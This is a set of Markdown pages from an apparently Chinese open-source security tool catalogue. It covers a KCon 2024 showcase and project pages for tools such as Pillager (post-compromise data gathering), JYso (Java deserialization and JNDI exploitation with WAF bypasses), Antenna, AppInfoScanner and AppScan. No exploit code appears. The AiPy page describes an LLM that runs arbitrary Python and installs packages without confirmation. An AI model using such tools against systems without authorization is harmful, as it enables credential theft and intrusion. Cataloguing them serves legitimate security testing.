本次大会,我们将如鹰击长空般探索人工智能在网络安全中的无限可能,揭开其神秘面纱,共享技术突破带来的绚烂光芒;本次大会,我们将汇聚全球黑客的智慧如百川归海,见证新质生产力如雨后春笋般崛起,为网络安全的未来绘制宏伟蓝图;本次大会,我们将凝聚十三载的辉煌成果,以归零的勇气和决心,再次踏上“技术突破如破竹、边界探索似探险、安全极致胜巅峰”的崭新征程,共同书写网络安全的新篇章!
本届大会以 **“同道”** 为主题,汇聚了网络安全领域的精英与志同道合之士,共谋网络安全之道,携手开创行业未来发展蓝图。
<div align="center">
<img src="Images_2024KCon/1.jpg" width="700">
</div>
详情访问:[KCon 2024 - KCon 黑客大会](https://kcon.knownsec.com/list-kcon2024.html)
为了鼓励国内安全自动化工具的发展,展示更多安全人员们的安全自动化研究成果,自2016年起,KCon黑客大会便引入「兵器谱」展示环节。
过去几届 KCon 黑客大会现场,已有七十多件“安全神兵利器”受到千余名参会者的观摩与试用,并获得媒体朋友们的广泛关注。
今年,我们为大家精心挑选出了7件安全江湖的“神兵利器”,将于KCon舞台尽情探索与展示!
<div align="center">
<img src="Images_2024KCon/2.png" width="700">
</div>
其中有 2 个项目来自404星链计划,他们分别是:
- [Pillager](https://github.com/qwqdanchun/Pillager)
- [JYso](https://github.com/qi4L/JYso)
>排名不分先后
### [Pillager](https://github.com/knownsec/404StarLink/blob/master/detail/Pillager.md)



https://github.com/qwqdanchun/Pillager
Pillager是一个适用于后渗透期间的信息收集工具,可以收集目标机器上敏感信息,方便下一步渗透工作的进行。
<div align="center">
<img src="Images_2024KCon/pillager.png" width="700">
</div>
### [JYso](https://github.com/knownsec/404StarLink/blob/master/detail/JYso.md)



https://github.com/qi4L/JYso
JYso 是一款可以同时当做 ysoserial 与 JNDIExploit 使用的工具,同时具备多种 JNDI 高版本、WAF、RASP 的 Bypass 功能。
<div align="center">
<img src="Images_2024KCon/jyso.png" width="700">
</div>
================================================
FILE: column/starlink_project_video.md
================================================
## 星际奇兵
「星际奇兵」是知道创宇404实验室“星链计划”下的开源安全工具视频演示栏目,本栏目对项目进行细致的演示指导,陆续更新中。跟我们一起快速上手这些优秀的安全工具吧!
以下账号同步更新,欢迎关注:
B站:知道创宇404实验室
Weibo/微信公众号:Seebug漏洞平台
**第一期演示项目:[KunLun-M](https://github.com/LoRexxar/Kunlun-M)**
自动化代码审计工具,有它一个就够了!——404星链计划KunLun-M
https://www.bilibili.com/video/BV15a411G7CT
**第二期演示项目:[HackBrowserData](https://github.com/moonD4rk/HackBrowserData)**
小心!这个工具可以窃取你的浏览器密码!——404星链计划HackBrowserData
https://www.bilibili.com/video/BV1eU4y1z7si
**第三期演示项目:[antSword](https://github.com/AntSwordProject/antSword)**
搞安全绝不能错过的跨平台网站管理工具——404星链计划antSword
https://www.bilibili.com/video/BV1Jg411h7Pj
**第四期演示项目:[CDK](https://github.com/cdk-team/CDK)**
Github高赞工具,渗透测试er看过来——404星链计划CDK
https://www.bilibili.com/video/BV1DG4y1Z784/
**第五期演示项目:[fscan](https://github.com/shadow1ng/fscan)**
【安全工具】5大功能,一键化内网扫描神器——404星链计划fscan
https://www.bilibili.com/video/BV1Cv4y1R72M
**第六期演示项目:[Viper](https://github.com/FunnyWolf/Viper)**
【安全工具】集成70+模块,红队内网渗透必备——404星链计划Viper
https://www.bilibili.com/video/BV1zv4y1s7xv
**第七期演示项目:[Pocsuite3](https://github.com/knownsec/pocsuite3)**
【安全工具】必备神器!开源远程漏洞测试框架——404星链计划Pocsuite3
https://www.bilibili.com/video/BV1gz4y1E7j1
**持续更新中……**
================================================
FILE: detail/AiPy.md
================================================
## AiPy <https://github.com/knownsec/aipyapp>
<!--auto_detail_badge_begin_0b490ffb61b26b45de3ea5d7dd8a582e-->





<!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451-->
# Python use
AIPy 是 Python-use 概念的一个具体实现,旨在展示该理念的实际价值与应用潜力。
使命: 释放大语言模型的全部潜能
愿景: 能够自主改进和使用 AIPy 的更聪明的LLM
## What
Python use 是把整个 Python 执行环境提供给 LLM 使用,可以想象为 LLM 坐在电脑前用键盘在 Python 命令行解释器里输入各种命令,按回车运行,然后观察执行结果,再输入代码和执行。
和 Agent 的区别是 Python use 不定义任何 tools 接口,LLM 可以自由使用 Python 运行环境提供的所有功能。
## Why
假如你是一个数据工程师,你对下面的场景一定不陌生:
- 处理各种不同格式的数据文件:csv/excel,json,html, sqlite, parquet ...
- 对数据进行清洗,转换,计算,聚合,排序,分组,过滤,分析,可视化等操作
这个过程经常需要:
- 启动 Python,import pandas as pd,输入一堆命令处理数据
- 生成一堆中间临时文件
- 找 ChatGPT / Claude 描述你的需要,手工拷贝生成的数据处理代码运行。
所以,为什么不启动 Python 命令行解释器后,直接描述你的数据处理需求,然后自动完成?好处是:
- 无需手工临时输入一堆 Python 命令
- 无需去找 GPT 描述需求,拷贝程序,然后手工运行
这就是 Python use 要解决的问题!
## How
Python use (aipython) 是一个集成 LLM 的 Python 命令行解释器。你可以:
- 像往常一样输入和执行 Python 命令
- 用自然语言描述你的需求,aipython 会自动生成 Python 命令,然后执行
而且,两种模式可以互相访问数据。例如,aipython 处理完你的自然语言命令后,你可以用标准 Python 命令查看各种数据。
## Interfaces
### ai 对象
- \_\_call\_\_(instruction): 执行自动处理循环,直到 LLM 不再返回代码消息
- save(path): 保存交互过程到 svg 或 html 文件
- llm 属性: LLM 对象
- runner 属性: Runner 对象
### LLM 对象
- history 属性: 用户和LLL交互过程的消息历史
### Runner 对象
- globals: 执行 LLM 返回代码的 Python 环境全局变量
- locals: 执行 LLM 返回代码的 Python 环境局部变量
### runtime 对象
供 LLM 生成的代码调用,提供以下接口:
- install_packages(packages): 申请安装第三方包
- getenv(name, desc=None): 获取环境变量
- display(path=None, url=None): 在终端显示图片
## Usage
AIPython 有两种运行模式:
- 任务模式:非常简单易用,直接输入你的任务即可,适合不熟悉 Python 的用户。
- Python模式:适合熟悉 Python 的用户,既可以输入任务也可以输入 Python 命令,适合高级用户。
默认运行模式是任务模式,可以通过 `--python` 参数切换到 Python 模式。
### 任务模式
`uv run aipython`
```
>>> 获取Reddit r/LocalLLaMA 最新帖子
......
......
>>> /done
```
`pip install aipyapp` ,运行aipy命令进入任务模式
```
-> % aipy
🚀 Python use - AIPython (0.1.22) [https://aipy.app]
请输入需要 AI 处理的任务 (输入 /use <下述 LLM> 切换)
>> 获取Reddit r/LocalLLaMA 最新帖子
......
>>
```
### Python 模式
#### 基本用法
自动任务处理:
```
>>> ai("获取Google官网首页标题")
```
#### 自动申请安装第三方库
```
Python use - AIPython (Quit with 'exit()')
>>> ai("使用psutil列出当前MacOS所有进程列表")
📦 LLM 申请安装第三方包: ['psutil']
如果同意且已安装,请输入 'y [y/n] (n): y
```
## Thanks
- 黑哥: 产品经理/资深用户/首席测试官
- Sonnet 3.7: 生成了第一版的代码,几乎无需修改就能使用。
- ChatGPT: 提供了很多建议和代码片段,特别是命令行接口。
- Codeium: 代码智能补齐
- Copilot: 代码改进建议和翻译 README
<!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
## 项目相关
## 最近更新
#### [v0.5.0] - 2026-02-18
**软件修复:**
- 架构完全重构
#### [v0.4.0] - 2025-11-28
**架构重构:**
- 全新的 Step-based 上下文清理机制,大幅减少 token 消耗
- 强类型事件系统,提供更好的类型安全和错误处理
- 重构子任务系统,支持重放和树状视图
**MCP 集成:**
- 完全重构 MCP 客户端,升级到 1.21.0
- 统一工具调用接口,改进进度跟踪
- 增强 MCP 工具调用限制规则
**LLM 客户端:**
- 新增 Gemini 客户端支持
- 引入 OpenAIBaseClientV2 增强参数处理
- 类型安全的配置管理系统
**用户体验:**
- 实时 token 使用统计和显示
- 新增 /compact 命令和改进的 /steps 命令
- 更好的国际化和多语言支持
**稳定性改进:**
- 网络错误重试机制优化
- Windows 任务目录重命名问题修复
- 序列化和存储错误修复
**文档完善:**
- 新增开发文档和功能说明
- 改进提示词系统
- 更新模型配置
**技术债务清理:**
- 升级 Python 最低版本到 3.11
- 依赖包更新和锁文件优化
- 代码结构优化和类型安全改进
#### [v0.3.0] - 2025-10-28
**优化**
- 优化 MCP
#### [v0.2.0] - 2025-06-26
**新增**
- 全新的GUI客户端2.0
- 集成MCP一键接入功能
#### [v0.1.28] - 2025-05-21
**新增**
- Trustoken集成联网搜索功能,新闻、时事查询更快捷,平均用时大幅降低。
- 任务执行完毕自动上传云端私密存储功能,方便用户案例管理或分享精彩案例给他人,该功能可通过配置关闭。
- Trustoken新增阿里Qwen、腾讯Hunyuan最新模型,多重选择更智能。
- GUI客户端可通过“aipyw”命令在终端直接打开。
- GUI客户端可通过“aipyw”命令在终端直接打开。
**优化**
- 新用户首次使用引导流程优化,操作体验更便捷。
- 大幅改善任务拆解、执行逻辑、内置最佳实践方案,执行复杂任务将用时更短、实现方案更可靠。
- 任务中Python库安装调整为无需确认方式,任务执行过程全自动完成。
- 修正多处缺陷。
<!--auto_detail_active_end_f9cf7911015e9913b7e691a7a5878527-->
================================================
FILE: detail/Antenna.md
================================================
## Antenna <https://github.com/wuba/Antenna>
<!--auto_detail_badge_begin_0b490ffb61b26b45de3ea5d7dd8a582e-->





<!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451-->
Antenna是58同城安全团队打造的一款辅助安全从业人员辅助验证网络中多种漏洞是否存在以及可利用性的工具。其基于带外应用安全测试(
OAST)通过任务的形式,将不同漏洞场景检测能力通过插件的形式进行集合,通过与目标进行Out-of-bind的数据通信方式进行辅助检测。
## Antenna的目标
我们绝不仅仅只是将Antenna做成一款只能监听DNS、HTTP等协议来简单判断无回显类型漏洞的工具,我们的目标是尝试在良好使用体验的基础上支持高度灵活的自定义组件能力,满足用户通过Antenna探索并实现各种应用安全漏洞场景的辅助检测。尽可能得实现通过Antenna这款产品降低各种安全漏洞场景的检测成本。
## 相关网站
博客(已开放):[Antenna 博客](http://blog.antenna.cool/docs/intro)
演示平台(暂时关闭):[演示平台](http://jiemuzu.cn)
漏洞靶场(已支持docker部署,docker-compose文件在项目docker目录中)
:[lcttty/antenna-range:0.0.1](https://github.com/wuba/Antenna/blob/main/docker/docker-compose-range.yaml)
## Antenna_Inside计划
在我们开发Antenna时,就希望能够支持现有市场上流行的漏洞扫描工具漏洞结果回调与主动查询
,所以我们推出了CallBack与OpenAPI。为了让我们的这两个模块能够更加灵活与优雅。我们决定发起
Antenna_Inside计划,如果您是使用扫描工具的用户或者作者请联系我们,我们会无条件支持您的项目与
需求,帮助Antenna更方便的与漏洞扫描流程打通。如果您有推荐打通的项目,也可以在issue中提出来
已加入Antenna_Inside项目
| 项目名称 | 项目地址 |
|------------|----------------------------------------------------------------------------|
| EasyPen | [https://github.com/lijiejie/EasyPen](https://github.com/lijiejie/EasyPen) |
## 近期使用疑问解答
#### 1、源码部署服务未启动,或者启动了DNS不好使
回答: 该项目暂不推荐使用python3.7版本以下环境部署,请认真查看安装部署教程-源码部署部分,
检查配置中项目路径与实际项目路径相同,启动后也可以尝试使用`supervisorctl status`
查看各个组件运行状态
#### 2、关于各类组件的使用说明以及能否再详细的进行说明自定义组件开发教程
回答:文章将在Antenna博客不定时更新,基础文章已有,后续详细的也会有的,作者在加班加点的写,绝不会让各位师傅等太久
#### 3、运行docker-compose命令后镜像构建时间过长
1. 可尝试修改Dockerfile中制定相关下载源地址内容
2. 可修改docker-compose文件中镜像,官方镜像已打包至dockerhub https://hub.docker.com/r/jihongjun/antenna/tags
可尝试使用`docker pull jihongjun/antenna` 进行拉取
#### 4、其他问题
如果您遇到了其他问题可查阅项目issue进行寻找相关解决方案,如果发现并没有其他人遇到和您相关的问题,请新建issue,
作者会及时回答您的疑问
## 相关教程链接
## 最新公告
DNS_REBINDING 功能演示:[Antenna v1.3.0 版本更新公告(含DNS REBINDING使用教程)](http://blog.antenna.cool/blog/V1.3.0%20update)
### 关于部署
基础部署教程:[安装部署](http://blog.antenna.cool/docs/intro)
隐匿部署教程:[关于Antenna的隐匿性部署](http://blog.antenna.cool/blog/%20%20Secrecy)
前后端分离部署 [Antenna的前后端分离部署](http://blog.antenna.cool/blog/client_server)
### 关于配置
基础配置教程:[基础配置教程](http://blog.antenna.cool/docs/%E5%85%B3%E4%BA%8E%E9%85%8D%E7%BD%AE/config)
域名配置及DNS相关配置:[域名配置及阿里云dns服务修改教程](http://blog.antenna.cool/docs/%E5%85%B3%E4%BA%8E%E9%85%8D%E7%BD%AE/DNS)
开通邮箱通知以及邮箱授权码申请教程:[QQ邮箱授权码申请教程](https://service.mail.qq.com/cgi-bin/help?subtype=1&id=28&no=1001256)
### 关于任务
任务基础使用教程:[如何简单的使用任务](http://blog.antenna.cool/docs/%E5%85%B3%E4%BA%8E%E4%BB%BB%E5%8A%A1/task)
### 关于组件
组件基础使用教程:[Antenna的灵魂-组件Template](http://blog.antenna.cool/docs/%E5%85%B3%E4%BA%8E%E7%BB%84%E4%BB%B6/template)
xss 组件使用教程:[xss组件使用教程](http://blog.antenna.cool/docs/%E5%85%B3%E4%BA%8E%E7%BB%84%E4%BB%B6/xss)
组件开发教程:[如何编写Antenna组件](http://blog.antenna.cool/docs/%E5%85%B3%E4%BA%8E%E7%BB%84%E4%BB%B6/template_demo)
自定义HTTP组件使用教程[自定义HTTP组件使用教程](http://blog.antenna.cool/docs/%E5%85%B3%E4%BA%8E%E7%BB%84%E4%BB%B6/custom_http)
### 关于OPEN_API与CallBack
OPEN_API与CallBack使用教程:[关于OPEN_API与CallBack](http://blog.antenna.cool/docs/api_back)
<!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
## 项目相关
## 最近更新
#### [v1.3.5] - 2023-04-21
**更新**
- 修复HTTPS分块传输请求导致处理逻辑错误
- 废弃domain_in查询方式,后续多个域名查询可使用多个domain参数查询
- 新增api查询用户token以及查询当前项目使用版本接口
#### [v1.3.4] - 2023-04-06
**更新**
- 增加OPENAPI 消息ORDER_DESC 参数
- 优化了工具方法逻辑,修复了一些已知的问题
- 为Python SDK 做接口适配开发
#### [v1.3.2] - 2023-03-01
**更新**
- 优化了任务模块功能逻辑
- 修复python3.6版本不支持socket解析ip的bug
#### [v1.3.1] - 2023-02-26
**更新**
- Readme 新增DNS Rebinding功能演示文档,支持并优化了DNS 缓存的逻辑
- 优化了平台消息处理模块的逻辑,减少了数据库的请求数量
- 修复了平台配置的一些bug
#### [v1.2.1] - 2022-10-19
**更新**
- 优化HTTP/HTTPS请求处理模块,消息结果展示数据请求报文
- 修复组件模块bug,添加组件代码展示&编辑功能
- OPEN_API新增domain_contains、content_contains查询关键字
- 优化用户使用体验、更新配置无需再重启docker及系统
- 日常修复了一些bug
<!--auto_detail_active_end_f9cf7911015e9913b7e691a7a5878527-->
================================================
FILE: detail/AntiDebug_Breaker.md
================================================
## AntiDebug_Breaker <https://github.com/0xsdeo/AntiDebug_Breaker>
<!--auto_detail_badge_begin_0b490ffb61b26b45de3ea5d7dd8a582e-->





<!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451-->
README
<!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
## 项目相关
## 最近更新
#### [v3.0.4] - 2026-03-11
谷歌插件应用商店:https://chromewebstore.google.com/detail/antidebug-breaker/opkclndfcbafdaecbbaklefnaadopcln
- 增加hook performance.now脚本。
- 修复反hook检测脚本时序问题。
<!--auto_detail_active_end_f9cf7911015e9913b7e691a7a5878527-->
================================================
FILE: detail/AppInfoScanner.md
================================================
## AppInfoScanner <https://github.com/kelvinBen/AppInfoScanner>
<!--auto_detail_badge_begin_0b490ffb61b26b45de3ea5d7dd8a582e-->





<!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451-->
### AppInfoScanner
一款适用于以HW行动/红队/渗透测试团队为场景的移动端(Android、iOS、WEB、H5、静态网站)信息收集扫描工具,可以帮助渗透测试工程师、攻击队成员、红队成员快速收集到移动端或者静态WEB站点中关键的资产信息并提供基本的信息输出,如:Title、Domain、CDN、指纹信息、状态信息等。
### 前言
- 本项目的开发者目前为个人开发者同时有自己的工作,新的功能或者需求会在闲暇时间进行开发,BUG会优先进行处理。
- 如果在使用中遇到问题或者有新的需求,请在[](https://github.com/kelvinBen/AppInfoScanner/issues)提交BUG反馈,提交BUG前请先阅读最后的"常见问题"。
- 如果您觉得这个项目对您有用,请点击本项目右上角的"star"按钮。
- 如果您想持续跟进新的版本情况,请点击本项目右上角的"Watch"按钮。
- 如果您想参与本项目的开发,请点击本项目右上角的"Fork"按钮,否则请勿点击"Fork"按钮。
### 免责声明
请勿将本项目技术或代码应用在恶意软件制作、软件著作权/知识产权盗取或不当牟利等**非法用途**中。实施上述行为或利用本项目对非自己著作权所有的程序进行数据嗅探将涉嫌违反《中华人民共和国刑法》第二百一十七条、第二百八十六条,《中华人民共和国网络安全法》《中华人民共和国计算机软件保护条例》等法律规定。本项目提及的技术仅可用于私人学习测试等合法场景中,任何不当利用该技术所造成的刑事、民事责任均与本项目作者无关。
### 适用场景
- 日常渗透测试中对APP中进行关键资产信息收集,比如URL地址、IP地址、关键字等信息的采集等。
- 大型攻防演练场景中对APP中进行关键资产信息收集,比如URL地址、IP地址、关键字等信息的采集等。
- 对WEB网站源代码进行URL地址、IP地址、关键字等信息进行采集等(可以是开源的代码也可以是右击网页源代码另存为)。
- 对H5页面进行进行URL地址、IP地址、关键字等信息进行采集等。
- 对某个APP进行定相信息收集等
### 功能介绍:
- [x] 支持目录级别的批量扫描
- [x] 支持DEX、APK、IPA、MACH-O、HTML、JS、Smali、ELF等文件的信息收集
- [x] 支持APK、IPA、H5等文件自动下载并进行一键信息收集
- [x] 支持自定义请求头、请求报文、请求方法
- [x] 支持规则自定义,随心自定义扫描规则
- [x] 支持自定义忽略资源文件
- [x] 支持自定义配置Android壳规则
- [x] 支持自定义配置中间件规则
- [x] 支持Android加固壳、iPA官方壳的检测
- [x] 支持IP地址、URL地址、中间件(json组件和xml组件)的信息采集
- [x] 支持Android对应包名下内容的采集
- [x] 支持网络嗅探功能,可以提供基本的信息输出
- [x] 支持Windows系统、MacOS系统、*nux系列的系统
- [x] 具备简单的AI识别功能,可以快速过滤三方URL地址
- [ ] 指纹识别模块
- [ ] 添加国际化语言包
- [ ] 一键对APK文件进行自动修复
- [ ] 识别到壳后自动进行脱壳处理
### 部分截图

### 环境说明
- Apk文件解析需要使用JAVA环境,JAVA版本1.8及以下
- Python3的运行环境
### 目录说明
```
AppInfoScanner
|-- libs 程序的核心代码
|-- core
|-- __init__.py 全局配置信息
|-- parses.py 用于解析文件中的静态信息
|-- download.py 用于自动下载APP或者H5页面
|-- net.py 用于进行网络嗅探,并获取基本信息
|-- task
|-- __init__.py 目录初始化文件
|-- base_task.py 统一任务调度中心
|-- android_task.py 用于处理Android相关的任务
|-- download_task.py 用于处理自动下载APP或者H5的任务
|-- ios_task.py 用于处理iOS相关的任务
|-- net_task.py 用于处理网络嗅探相关任务
|-- web_task.py 用于处理Web相关的任务,比如网页右键源代码、H5相关的静态信息
|-- tools 程序需要依赖的工具
|-- apktool.jar 用于反编译apk文件,不同平台可能需要进行自我切换
|-- baksmali.jar 用于反编译dex文件,不同平台可能需要进行自我切换
|-- strings.exe 用于windows 32下获取iPA的字符串信息
|-- strings64.exe 用于windows 64的系统获取iPA的字符串信息
|-- __init__.py 目录初始化文件
|-- app.py 主运行程序
|-- config.py 整个程序的配置文件
|-- README.md 程序使用说明
|-- requirements.txt 程序中需要安装的依赖库
|-- update.md 程序历史版本信息
```
### 使用说明
1. 下载
```
git clone https://github.com/kelvinBen/AppInfoScanner.git
或者复制以下链接到浏览器下载最新正式版本
https://github.com/kelvinBen/AppInfoScanner/releases/latest
国内快速下载通道:
git clone https://gitee.com/kelvin_ben/AppInfoScanner.git
```
2. 安装依赖库
```
cd AppInfoScanner
python3 -m pip install -r requirements.txt
```
3. 运行(基础版)
- 扫描Android应用的APK文件、DEX文件、需要下载的APK文件下载地址、保存需要扫描的文件的目录
```
python3 app.py android -i <Your APK File or DEX File or APK Download Url or Save File Dir>
```
- 扫描iOS应用的IPA文件、Mach-o文件、需要下载的IPA文件下载地址、保存需要扫描的文件目录
```
python3 app.py ios -i <Your IPA file or Mach-o File or IPA Download Url or Save File Dir>
```
- 扫描Web站点的文件、目录、需要缓存的站点URl
```
python3 app.py web -i <Your Web file or Save Web Dir or Web Cache Url>
```
### 进阶操作指南
#### 基本命令格式
```
python3 app.py [TYPE] [OPTIONS] <The URL or directory to scan>
```
#### 符号信息说明
```
<> 代表需要扫描的文件或者目录或者URL地址
| 或的关系,只能选择一个
[] 代表需要输入的参数
```
#### TYPE参数详细说明
此参数类型对应基本命令格式中的[TYPE],目前仅支持[android/ios/web]三种类型形式,三种类型形式必须指定一个。
```
android: 用于扫描Android应用相关的文件的内容
ios: 用于扫描iOS应用相关的文件内容
web: 用于扫描WEB站点或者H5相关的文件内容
```
支持自动根据后缀名称进行修正,即便输入的是ios,实际上-i 输入的参数的文件名为XXX.apk,则会执行android相关的扫描。
#### OPTIONS参数详细说明
该参数类型对应基本命令格式中的[OPTIONS],支持多个参数共同使用
```
-i 或者 --inputs: 输入需要进行扫描的文件、目录或者需要自动下载的文件URL地址,如果路径过长请加"进行包裹,此参数为必填项。
-r 或者 --rules: 输入需要扫描文件内容的临时扫描规则。
-s 或者 --sniffer: 开启网络嗅探功能,默认为开启状态。
-n 或者 --no-resource: 忽略所有的资源文件,包含网络嗅探功能中的资源文件(需要先在config.py中配置sniffer_filter相关规则),默认为不忽略资源。
-a 或者 --all: 输出所有符合扫描规则的结果集合,默认为开启状态。
-t 或者 --threads: 设置线程并发数量,默认为10个线程并发。
-o 或者 --output: 指定扫描结果和扫描过程中产生的临时文件的输出目录,默认为脚本所在的目录。
-p 或者 -- package: 指定Android的APK文件或者DEX文件需要扫描的JAVA包名信息。此参数只能在android类型下使用。
```
#### 具体使用方法
##### Android相关基本操作
- 对本地APK文件进行扫描
```
python3 app.py android -i <Your apk file>
例:
python3 app.py android -i C:\Users\Administrator\Desktop\Demo.apk
```
- 对本地Dex文件进行扫描
```
python3 app.py android -i <Your DEX file>
例:
python3 app.py android -i C:\Users\Administrator\Desktop\Demo.dex
```
- 对URL地址中包含的APK文件进行扫描
```
python3 app.py android -i <APK Download Url>
例:
python3 app.py android -i "https://127.0.0.1/Demo.apk"
```
需要注意此处如果URL地址过长需要使用双引号(")进行包裹
##### iOS相关基本操作
- 对本地IPA文件进行扫描
```
python3 app.py ios -i <Your ipa file>
例:
python3 app.py ios -i "C:\Users\Administrator\Desktop\Demo.ipa"
```
- 对本地Macho文件进行扫描
```
python3 app.py ios -i <Your Mach-o file>
例:
python3 app.py ios -i "C:\Users\Administrator\Desktop\Demo\Payload\Demo.app\Demo"
```
- 对URL地址中包含的IPA文件进行扫描
```
python3 app.py ios -i <IPA Download Url>
例:
python3 app.py ios -i "https://127.0.0.1/Demo.ipa"
```
需要注意此处如果URL地址过长需要使用双引号(")进行包裹,暂时不支持对Apple Store中的IPA文件进行扫描
##### Web相关基本操作
- 对本地WEB站点进行扫描
```
python3 app.py web -i <Your web file>
例:
python3 app.py web -i "C:\Users\Administrator\Desktop\Demo.html"
```
- 对URL地址中包含的WEB站点文件进行扫描
```
python3 app.py web -i <Web Download Url>
例:
python3 app.py web -i "https://127.0.0.1/Demo.html"
```
##### 具有共同性的操作
以下操作均以android类型为例:
- 对一个本地的目录进行扫描
```
python3 app.py android -i <Your Dir>
例:
python3 app.py android -i C:\Users\Administrator\Desktop\Demo
```
- 添加临时规则或者关键字
```
python3 app.py android -i <Your apk> -r <the keyword | the rules>
例:
添加对百度域名的扫描
python3 app.py android -i C:\Users\Administrator\Desktop\Demo.apk -r ".*baidu.com.*"
```
- 关闭网络嗅探功能
```
python3 app.py android -i <Your apk> -s
例:
python3 app.py android -i C:\Users\Administrator\Desktop\Demo.apk -s
```
- 忽略所有的资源文件
```
python3 app.py android -i <Your apk> -n
例:
python3 app.py android -i C:\Users\Administrator\Desktop\Demo.apk -n
```
- 关闭输出所有符合扫描规则内容的功能
```
python3 app.py android -i <Your apk> -a
例:
python3 app.py android -i C:\Users\Administrator\Desktop\Demo.apk -a
```
- 设置并发数量
```
python3 app.py android -i <Your apk> -t 20
例:
设置20个并发线程
python3 app.py android -i C:\Users\Administrator\Desktop\Demo.apk -t 20
```
- 指定结果集和缓存文件输出目录
```
python3 app.py android -i <Your apk> -o <output path>
例:
比如输出到桌面的Temp目录
python3 app.py android -i C:\Users\Administrator\Desktop\Demo.apk -o C:\Users\Administrator\Desktop\Temp
```
- 对指定包名下的文件内容进行扫描,该功能仅支持android类型
```
python3 app.py android -i <Your apk> -p <Java package name>
例:
比如需要过滤com.baidu包名下的内容
python3 app.py android -i C:\Users\Administrator\Desktop\Demo.apk -p "com.baidu"
```
### 高级版使用说明
该项目中的程序仅作为一个基本的架子,会内置一些基本的规则,并不是每一个输入的内容都可以完成相关的扫描工作。所以可以根据自己的需要进行相关规则的配置,优秀的配置内容可以达到质的的效果。
- 配置文件路径为 根目录下的config.py文件,即README.md的同级目录
#### 配置项说明
```
filter_components: 此配置项用于配置相关组件内容,包括Json组件或者XML组件等
filter_strs: 用于配置需要进行扫描的文件内容,比如需要扫描端口号,则配置为:"r'.*://([\d{1,3}\.]{3}\d{1,3}).*'"
filter_no: 用于忽略扫描文件中不想要的内容
shell_list: 用于配置Android相关的壳特征
web_file_suffix: 此处配置需要进行扫描的WEB文件后缀名称
sniffer_filter: 此处用于配置需要进行忽略网络嗅探的文件后缀名称
headers: 用于配置自动下载过程中需要的请求头信息
data: 用于配置自动下载过程中需要的请求报文体
method: 用于配置自动下载过程中需要的请求方法
```
<!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
## 项目相关
## 最近更新
#### [v1.0.9] - 2022-10-23
**更新**
- 更新apktool为最新版本
- 优化部分环节流程
- 修复excle文件导出时超时行数限制
- 修复脚本执行时卡顿的问题
- 修复Mac下Playload文件权限不足的问题
<!--auto_detail_active_end_f9cf7911015e9913b7e691a7a5878527-->
================================================
FILE: detail/AppScan.md
================================================
## AppScan <https://github.com/TongchengOpenSource/AppScan>
<!--auto_detail_badge_begin_0b490ffb61b26b45de3ea5d7dd8a582e-->





<!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451-->
<h1 align="center">
<a href="https://github.com/tongcheng-security-team/Appscan"><img src="https://github.com/TongchengOpenSource/AppScan/raw/main/doc/image/AppScan.png" width="30%" alt="AppScan"></a>
</h1>
---
<h4 align="center">安全隐私卫士(AppScan)一款免费的企业级自动化隐私检测工具。</h4>
## 背景
  随着移动互联网的高速发展, 各公司对保护用户的个人隐私安
全意识也在愈发重视. 但是在实际业务场景中受限于代码开发
质量或因产品设计不谨慎等原因, APP 难免会引入一些违规收集
的合规问题, 因此各公司也在加大人力进行合规风险检测, 不过
随着业务不断发展、功能的频繁迭代更新, 导致人工检测成本
突增并且很多功能无法检测覆盖, 基于以上背景, 我们开发了
AppScan 这款隐私合规检测工具, 它是一款基于动态分析, 可以
精准定位 APP 的违规风险点的自动化隐私检测工具, 能够大大
提高了合规检测的效率, 帮助使用者便捷、高效、全面的完成
合规检测, 保障业务合规运行.
  AppScan作为一款免费工具,可以帮助大家便捷、高效、全面的完成合规检测,但是由于AppScan还是一个刚孵化的产品,在自动化等方面还没有很完善,我们希望可以吸取大家在使用过程中发现的问题以及优化的建议,帮助AppScan一起成长。
## AppScan优点
+ 全面性:  从信息收集、权限申请及数据传输等多个维度,实现对APP个人信息合规的全面检测。
+ 规范性:  全面覆盖《App违法违规收集使用个人信息行为认定方法》、国家标准GB/T35273《信息安全技术 个人信息安全规范》、《中华人民共和国网络安全法》等主流安全检测标准。
+ 高效性:  可帮助APP开发公司及开发者快速对APP进行日常合规检测,深度挖掘隐私合规风险点、快速处理大批量App,替代人工翻查代码,降低时间与人力成本,显著提升检测效率。
+ 易用性:  无需环境搭配、开箱即用。
## 安装指南
⬇️[下载地址](https://github.com/tongcheng-security-team/AppScan/releases)
## 支持的环境
- windows: 10及以上
- macOs: 11.0及以上
- android: 8.x及以上
- app: 64位/未加固(有时候引入的第三方sdk也会自带一些反检测功能)
## 模拟器
根据 https://github.com/TongchengOpenSource/AppScan/discussions/29 的投票结果, 我们对MuMu和雷电进行了适配工作调研
目前支持的模拟器
- 雷神模拟器9(需要在 设置-其他设置 中开启root权限, 设置ADB调试为'开启本地连接')
目前暂不支持的模拟器
- MuMu模拟器12(未找到ADB开关, 导致ADB无法识别到设备)
## 使用文档
> 使用者查看此文档即可
🏠[使用文档](https://github.com/TongchengOpenSource/AppScan/wiki)
## 开发文档
> 开发者需要额外查看文档
### 架构
👽[架构说明](https://github.com/TongchengOpenSource/AppScan/blob/main/doc/architecture.md)
### 开发文档
👽[开发文档](https://github.com/TongchengOpenSource/AppScan/blob/main/doc/dev.md)
### build指南
👽[build指南](https://github.com/TongchengOpenSource/AppScan/blob/main/doc/build.md)
### api文档
👽[api文档](https://github.com/TongchengOpenSource/AppScan/blob/main/doc/api.md)
## 系统展示
* 连接展示

* 结果展示

<!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
## 项目相关
## 最近更新
#### [v2.1.5] - 2024-05-26
**新功能**
- 修复AndroidID误报
- SDK名单新增quickGame匹配
**优化**
- 丰富安卓ID触发场景
- 丰富获取安装app信息触发场景
**修复**
- 打标信息缺失
#### [v2.1.2] - 2023-11-25
**新功能**
- 支持雷电模拟器9
- 更新frida到16.1.4
- 更新adb到RC14.0.5
**优化**
- 迁移更新源到githubRelease
- '关于我们'菜单优化
- 增加错误日志记录堆栈信息
**修复**
